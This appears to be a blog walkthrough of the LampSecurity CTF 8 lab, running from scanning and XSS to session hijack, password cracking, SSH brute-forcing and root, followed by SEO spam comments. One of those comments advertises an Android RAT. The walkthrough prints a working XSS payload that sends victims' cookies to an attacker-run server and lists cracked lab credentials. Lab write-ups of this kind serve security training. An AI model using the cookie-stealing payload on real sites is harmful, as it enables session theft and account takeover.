In this article I am going to capture the flag for the LampSecurity CTF 8 Challenges. This is a beginner level challenge. We will start
with scanning the environment and end with getting the root access, In between
my target will be capture the hidden flags. So let’s get started.
List of actions:
- Scan the network
- HTTP enumeration.
- Web vulnerability scanning
- Spidering Web directory
- Session hijack
- Crack the password
- Brute-forcing SSH credentials
- Get the access and capture the flags
- Root privilege
Before start the scanning lets discover the network first
with netdiscover.
We have successfully discover our target
1
Scan the network
We will start with network scan with nmap. For this lets
execute the below command in Kali console.
After the result we found the following ports are open in the output.
-
21
-
22
-
25
-
80
-
110
-
111
-
139
-
143
-
443
-
445
-
993
-
995
-
3306
-
5801,5802,5901,5902,5903,5904
-
6001,6002,6004,6003
Based on the above result it is confirmed there is a web
application running on port 80 so we will chose our start point with the same.
2
Web vulnerability scanning
Let’s scan the web application with Nikto and try to
discover the present vulnerability.
After the scan we got the below results which is important
for our upcoming walk through.
-
Phpinfo.php page is available to access
-
The application is vulnerable to XXS attack.
Now during exploring the web application, let’s check the
source code of the home page.
We have successfully captured our first flag.
#flag#550e1bafe077ff0b0b67f4e32f29d751
After got the first flag we will go with the nikto result
and try to explore the phpinfo page.
Great!! We have got our second flag in a row.
#flag#550e1bafe077ff0b0b67f4e32f29d751
3
Spidering Web directory
Now come to home page and read any of the article to get
further clue.
While exploring the page I have got a new directory which
was not displayed during the vulnerability scan. So we will scan the directory
using dirb to get any useful information.
After the scanning result I have got something different which
push me to think to check further
Lets try to explore the above path and see what else we can
get
Bingo! We have got our third flag
#flag#57dbe55b42b307fb4115146d239955d0
4
Session hijack
Now let’s create a user account to get the user access
I have successfully created one user named “iamuser”. Now
got any of the blog and try to check if the comment section is vulnerable to
XXS.
Enter the below script and click on preview
<script>alert(‘hi’)</script>
From the above result it is clear the application is
vulnerable to XSS.
Now we will try to hijack the session cookie of the writer
of the blog and forward it to cookie capture application running inside our own
server. To know more please click
here to read previous article.
For doing this please paste the below HTML code inside the
command box and save it.
<html>
<body>
<b> wanteddev</b>
<u>click me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.1.2/Cookie_stealer.php?c="+document.cookie)> </iframe >
</body>
</html>
<body>
<b> wanteddev</b>
<u>click me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.1.2/Cookie_stealer.php?c="+document.cookie)> </iframe >
</body>
</html>
Now the above code will give us the session ID whoever visit
the comment in the first place. Here we will make the blog writer visit the
link to get the cookie id and highjack his session. For doing that we will send
the link to him via email and we will wait until and unless he clicks on the
link.
Now click on the username
After that you have to paste the link in contact form and
send to the user.
Now wait for couple of minutes we will get the session id
inside our server.
We have successfully got the session id
Now we will try to get the session by pasting the copied
session id using the cookie manager firefox plugin.
Now our next step will be post the sql query and try to
fetch the user details.
As we know Drupal’s default table is user and the columns
for user and password are user,pass respectively.
So please goto content management and create content, then
click on page, now copy and paste the below sql with php code, select the
content type as php and then cleck on preview.
You will successfully get the current user details with the
md5 password hash.
5
Crack the password
Save it in a file and try to crack using john the ripper
tool.
After the cracking process we have got the below results
6
Brute-forcing SSH credentials
Let’s save the users and password in separate files to do
our next step which is brute forcing the SSH login.
After that lets execute the below command in the terminal.
And wait to get success message.
So sad, we did not get any success. Still don’t have to worry let’s
explore the blogger profile and see if we get any hint further.
From the above screenshot we can see the user Steve is having
his user name in the email as spinkton. Similarly we will check each and every user profile
by editing the URL and store the user name inside a file.
Now lets try to brute-force again with the new user list.
This time we have got three SUCCESS credentials. Following:
bdio – passw0rd
jharraway – letmein!
spinkton – football123
7
Get the access and capture the flags
Let’s try to login one by one
Great we have got another flag here
Now try to login with the next credential. Nice! We have got
another flag inside this.
![]() |
Let’s move to the next credential. Again! We have got one
more flag inside.
8
Root privilege
After all this let’s try to do sudo login to check if this
user has root privilege.
Awesome!! We have successfully got the root user.
Thanks for read my article. Please let me know your valuable
feedback in the comment section below.
Good Demonstration.
ReplyDeleteThanks
DeleteWow, What an Outstanding post. I found this too much informatics. It is what I was seeking for. I would like to recommend you that please keep sharing such type of info.If possible, Thanks. Integriti Access Control Melbourne
ReplyDeleteActually I read it yesterday but I had some thoughts about it and today I wanted to read it again because it is very well written. security company
ReplyDeleteIt has fully emerged to crown Singapore's southern shores and undoubtedly placed her on the global map of residential landmarks. I still scored the more points than I ever have in a season for GS. I think you would be hard pressed to find somebody with the same consistency I have had over the years so I am happy with that. security company
ReplyDeleteThis is an awesome moving article.
ReplyDeletesecurity penetration
The article was up to the point and described the information very effectively. Thanks to blog author for wonderful and informative post.
ReplyDeleteSecurity Solution firm
It is also the most versatile lamp that you can buy anywhere. modern floor lamps
ReplyDeleteHow important this flexibility is will determine if you want to upgrade to the lamp above. modern floor lamps
ReplyDeletebreach the security Yes i am totally agreed with this article and i just want say that this article is very nice and very informative article.I will make sure to be reading your blog more. You made a good point but I can't help but wonder, what about the other side? !!!!!!Thanks
ReplyDeletesentry mba Androrat Download. The best android RAT (remote-administration tool) introduced with a wide range of functions. It includes Androrat APK & Androrat Binder.
ReplyDeleteSimply want to say your article is as surprising. The clearness in your post is simply great and i could assume you are an expert on this subject. Well with your permission allow me to grab your feed to keep updated with forthcoming post. Thanks a million and please continue the enjoyable work.
ReplyDeleteSalt Lamps
salt lamps shop UK
himalayan pink salt lamp uk
pink salt lamps online
himalayan salt lamps in United Kingdom
Pink salt lamp online shop uk
himalayan salt lamps UK
pink salt himalayan lamps
natural himalayan salt lamp
pink salt himalayan lamps uk
pink salt lamp price in UK
natural rock salt lamp online
salt lamps shop online
lamps of himalayan pink salt
salt lamp shop
salt lamp online
Salt lamps uk
But the reality is that they are already being watched by human security personnel, undercover store detectives, maintenance personnel, and www.24response.com high-tech surveillance cameras. And, anytime you enter a private facility, the facility has almost carte blanche authority to watch over your every move.
ReplyDeleteAs we as a whole know, whenever we begin discussing the best precious stone table lamp, we need to begin with Waterford Crystal. https://www.insignis.ro/corpuri-de-iluminat/
ReplyDeleteNice knowledge gaining article. This post is really the best on this valuable topic. you can visit
ReplyDeleteActually, PC security cameras send the pictures to a DVR hard drive with a recorder.Cctv installation
ReplyDeleteWithout fail, your writing style is top professional; even your website also looks amazing thank you for posting. empresa de seguridad
ReplyDeleteSkip Energy is a Texas Electric Company situated in Houston. Bob Energy's objective is give more than low Texas Electric Rates to our clients. With inventive and adaptable plans, amazing client assistance, and prevalent client rewards, Bounce Energy offers an interesting way to deal with Texas power.electrician
ReplyDeleteWith mixture able security camera DVR frameworks like our Alnet Systems DVR cards, home and entrepreneurs can begin with simple security cameras alone, and basically add permit later for added IP cameras or extra cards for more conventional CCTV cameras. tampa security cameras
ReplyDeleteThank you very much for writing such an interesting article on this topic. This has really made me think and I hope to read more. Stainless Steel Screen Doors
ReplyDeleteNumerous people are ignorant of how weak their normal security system is a result of the way that the wiring utilized in the system can be handily undermined. cctv camera installation near me
ReplyDeleteWhen it comes to safeguarding your house, the most obvious place to begin is with the front door. It's surprising how many people in this day and age still leave their doors unlocked, or use poor locks. Even if you live in a rural area, crime occurs where you live. Your doors' strength and durability is important for home security. A home security door is simply a smart investment. Residential Security doors
ReplyDeletethanks for this usefull article, waiting for this article like this again. rastreo gps
ReplyDeletePsychological warfare is no uncertainty a terrible confronted advancement which has inundated everybody's consideration. So try not to be shocked to observe a huge number of dollars being spent on global counter psychological oppression and law authorization security arrangements.www.boswen.com.au
ReplyDeleteA wired camera works similarly, then again, actually the sign is shipped off the capacity gadget through wires rather than radio signs.
ReplyDeleteSecurity Camera Installation
I admire this article for the well-researched content and excellent wording. I got so involved in this material that I couldn’t stop reading. I am impressed with your work and skill. Thank you so much. https://singaporesecuritycompany.weebly.com/
ReplyDeleteAccess Control - best poe cctv system uk - Gates - fire alarms. Design Installation & Servicing. Let Contact Fire & Security Supply You with High-Quality Security Systems. View Case Studies. Get A Quote.
ReplyDeleteYou make so many great points here that I read your article a couple of times. Your views are in accordance with my own for the most part. This is great content for your readers. security services singapore
ReplyDeleteI think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article. https://securitycompany123.blogspot.com/2021/09/the-commercial-enterprise-owners.html
ReplyDeleteI really loved reading your blog. It was very well authored and easy to undertand. Unlike additional blogs I have read which are really not tht good. I also found your posts very interesting. In fact after reading, I had to go show it to my friend and he ejoyed it as well! check more info about singapore security guard
ReplyDeletestar wars todesstern lampe I think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article.
ReplyDeleteI like your post. It is good to see you verbalize from the heart and clarity on this important subject can be easily observed... https://cambodiaservices-website.yolasite.com
ReplyDeleteI have a hard time describing my thoughts on content, but I really felt I should here. Your article is really great. I like the way you wrote this information. https://securityserviceincambodia348794372.wordpress.com/2022/01/03/a-review-of-a-security-service-in-cambodia/
ReplyDeleteSince 9/11 the security business has seen a spike sought after. With this interest has come the prerequisite for security experts to viably deal with the capital consumed during the framework time on earth cycle and during retrofit projects. Qualtech Security
ReplyDeleteYou have done a great job on this article. It’s very readable and highly intelligent. You have even managed to make it understandable and easy to read. You have some real writing talent. Thank you. Reliable Security Service in Cambodia
ReplyDeleteI’m very happy to read this. This is the type of manual that needs to be given and not the random misinformation that is at the other blogs. Appreciate your sharing this best doc. news
ReplyDeleteI have bookmarked your blog, the articles are way better than other similar blogs.. thanks for a great blog! get info here for cambodia security company
ReplyDeleteThanks for taking the time to discuss this, I feel strongly about it and love learning more on this topic. If possible, as you gain expertise, would you mind updating your blog with more information? It is extremely helpful for me. https://penzu.com/p/7a1e7bc2
ReplyDeleteplanet lamp Pretty good post. I just stumbled upon your blog and wanted to say that I have really enjoyed reading your blog posts. Any way I'll be subscribing to your feed and I hope you post again soon. Big thanks for the useful info.
ReplyDeleteThis was really an interesting topic and I kinda agree with what you have mentioned here! security company in sihanoukville
ReplyDeleteI am happy to find this post Very useful for me, as it contains lot of information. I Always prefer to read The Quality and glad I found this thing in you post. Thanks Uniarch
ReplyDeleteGreat job for publishing such a beneficial web site. Your web log isn’t only useful but it is additionally really creative too. https://teresasean9.wixsite.com/my-site/post/benefits-of-being-a-school-security-guard
ReplyDeletegalaxy lampe A very awesome blog post. We are really grateful for your blog post. You will find a lot of approaches after visiting your post.
DeleteI wanted to thank you for this excellent read!! I definitely loved every little bit of it. I have you bookmarked your site to check out the new stuff you post. security company in cambodia
ReplyDeleteYes i am totally agreed with this article and i just want say that this article is very nice and very informative article.I will make sure to be reading your blog more. You made a good point but I can't help but wonder, what about the other side? !!!!!!Thanks best security company in cambodia
ReplyDeleteI read that Post and got it fine and informative. security company in phnom penh
ReplyDeleteHey, I am so thrilled I found your blog, I am here now and could just like to say thank for a tremendous post and all round interesting website. Please do keep up the great work. I cannot be without visiting your blog again and again. https://security-s-school-1cc6.thinkific.com/courses/your-first-course
ReplyDeletePositive site, where did u come up with the information on this posting?I have read a few of the articles on your website now, and I really like your style. Thanks a million and please keep up the effective work. private security company
ReplyDeleteMajor thanks for the article. Will read on...
ReplyDeletebest security guard company services provider
This particular is usually apparently essential and moreover outstanding truth along with for sure fair-minded and moreover admittedly useful My business is looking to find in advance designed for this specific useful stuffs… nachttischlampe mond
ReplyDeleteHello I am so delighted I located your blog, I really located you by mistake, while I was watching on google for something else, Anyways I am here now and could just like to say thank for a tremendous post and a all round entertaining website. Please do keep up the great work. security guard phnom penh
ReplyDeleteThank you because you have been willing to share information with us. we will always appreciate all you have done here because I know you are very concerned with our. buy alarm monitoring system
ReplyDeleteThis is my first time i visit here. I found so many interesting stuff in your blog especially its discussion. From the tons of comments on your articles, I guess I am not the only one having all the enjoyment here keep up the good work security guard sihanoukville
ReplyDeleteIt was wondering if I could use this write-up on my other website, I will link it back to your website though.Great Thanks. https://security908s-site.yolasite.com
ReplyDeleteThank you ever so for you blog article. Thanks Again. Cool.
ReplyDeletedata archiving price
Enjoyed every bit of your blog post. Really looking forward to read more. Fantastic. https://site-8482778-3128-6065.mystrikingly.com/blog/security-guard-company-in-cambodia-information
ReplyDeleteVery neat article. Awesome. buy cctv in singapore
ReplyDeleteReally informative article post. Really thank you! Really Great. cctv surveillance system
ReplyDeleteI loved your blog post. Really thank you! Will read on... data archiving in singapore
ReplyDeleteWe give our clients expertly gifted security labor at different levels.
ReplyDeleteAlpha Security Montreal
Bodyguards are highly trained professionals who prioritize the safety and security of their clients. Alpha Sécurité Montréal
ReplyDeleteBodyguards are highly trained professionals who prioritize the safety and security of their clientsAbdullah
ReplyDeleteHere comes the job of security guards. Alpha Securite Montreal
ReplyDelete